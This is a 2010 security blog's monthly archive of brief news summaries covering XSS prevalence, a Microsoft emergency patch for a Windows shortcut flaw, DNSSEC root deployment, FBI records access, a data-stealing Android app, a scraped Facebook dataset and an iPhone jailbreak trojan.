The Security Pub

Random Thoughts About Security

Monthly Archives: July 2010

Organizations Fail against XSS Attacks

“More websites are vulnerable to hackers than a year ago, with security now a concern across all sectors.”

According to a report from IT testing company NTA Monitor, 7% of sites fall under the high-risk security category, compared to 5% in 2009.

Technology director at NTA Roy Hills said that companies are failing to address security weaknesses when they arise. “It is important that organizations remember that testing their sites will only indicate where they are deficient and they need to take action as soon as they are made aware of the problems,” he said.

NTA Monitor found that cross-site scripting (XSS) vulnerabilities were still a problem for many websites. With the introduction of Web 2.0, it has become essential for an application to accept more user input to enhance the user experience. Without proper input validation mechanisms an application can open up more areas for an attacker to exploit.

Other factors, such as an unresponsive third-party supplier that owns the underlying code, can also contribute to the prevalence of the issue, NTA Monitor said.

The public sector was identified as most high-risk, with the average number of vulnerabilities almost double those in 2009. The report added that government security breaches are likely to increase due to the impact of impending spending cuts. Manufacturing, legal services and IT & telecoms were also found to have websites among the most vulnerable to hackers.

This story was first published by Computer Weekly

Another Emergency Patch from Microsoft

mspatch Warning of an uptick in attacks, Microsoft plans to issue an emergency update to patch a critical Windows vulnerability that hackers are exploiting to seize control of PCs.

The patch, which fixes the way Windows parses shortcut icons, will be released on Monday at around 10 a.m. California time. It comes two weeks after reports surfaced that unknown hackers were exploiting the flaw in an attempt to install malware on systems that control the operations of power plants and other critical infrastructure. At least two customer of SCADA, or supervisory control and data acquisition, software offered by Siemens have been hit by a computer worm that exploits the bug.

Check out the article – [The Register]

DNSSEC is Now Updated

DNSSEC BLACK HAT USA — Las Vegas — Two years after a major flaw was exposed in the Internet’s Domain Name System (DNS), a major upgrade to the infrastructure protocol that fixes that weakness is now up and running in all of the Internet root servers.

DNSSEC, which has been in the works for nearly two decades, was fully deployed in the root this month, the final level of deployment needed to finally get the deployment of the security protocol officially off the ground. DNSSEC is considered the key to preventing attacks exploiting the now-infamous cache-poisoning vulnerability revealed at Black Hat USA in 2008.

Check out the article – [DarkReading]

FBI May Get Easier Access To Internet Activity

fbi The Obama administration is seeking to make it easier for the FBI to compel companies to turn over records of an individual’s Internet activity without a court order if agents deem the information relevant to a terrorism or intelligence investigation.

The administration wants to add just four words — "electronic communication transactional records" — to a list of items that the law says the FBI may demand without a judge’s approval. Government lawyers say this category of information includes the addresses to which an Internet user sends e-mail; the times and dates e-mail was sent and received; and possibly a user’s browser history. It does not include, the lawyers hasten to point out, the "content" of e-mail or other Internet communication.

Check out the article – [The Washington Post]

Android Application Steals Data

Android A seemingly innocuous Android app that let users change their phone’s wallpaper has actually been stealing private user information and may have been downloaded millions of times. Mobile security firm Lookout unearthed the truth behind the deceitful app and presented its findings at the Black Hat security technology conference in Las Vegas, as reported by Venture Beat.

Check out the article – [TG Daily]

Facebook 'hack' releases 100 million user details onto file sharing sites

fb The data file, which was seeded on to BitTorrent file sharing services earlier this week by Ron Bowes, a security consultant, is around 2.8 gigabytes large, and contains the public Facebook profiles of 100 million users of the social networking site – around 20% of Facebook’s global membership.  Facebook says that the data that the Nmap securitry researcher collected is in the public domain and no privacy rules have been breached.

Check out the article – [InfoSecurity]

Trojan masquerades as iPhone jailbreaking software

iPhoneVirus An email campaigned targeting iPhone users who might want to jailbreak their device has been detected by BitDefender.  Only a couple of days after U.S. federal regulators decided and announced that the practice wasn’t illegal, cybercriminals have seized the opportunity to infect more systems, and the following email started hitting inboxes all over the world.

Check out the article – [Help Net Security]